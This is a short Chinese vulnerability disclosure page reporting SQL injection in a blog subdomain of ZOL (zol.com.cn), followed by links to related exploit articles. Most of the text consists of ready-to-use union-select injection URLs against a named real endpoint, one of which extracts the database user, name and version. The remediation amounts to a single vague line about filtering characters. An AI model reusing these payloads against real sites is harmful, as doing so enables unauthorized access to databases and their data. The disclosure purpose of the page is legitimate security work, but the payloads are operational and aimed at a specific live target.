中关村在线博客子站SQL注入及修复方案
摘要:http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0unionselect1,...
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--



修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
【中关村在线博客子站SQL注入及修复方案】相关文章:
★ Microsoft SharePoint 服务器源码 HTML 注入漏洞
★ Velocity Parse()函数引发的本地包含漏洞及利用方法
★ 时时送订单系统后台登陆框post注入的方法介绍以及修复方案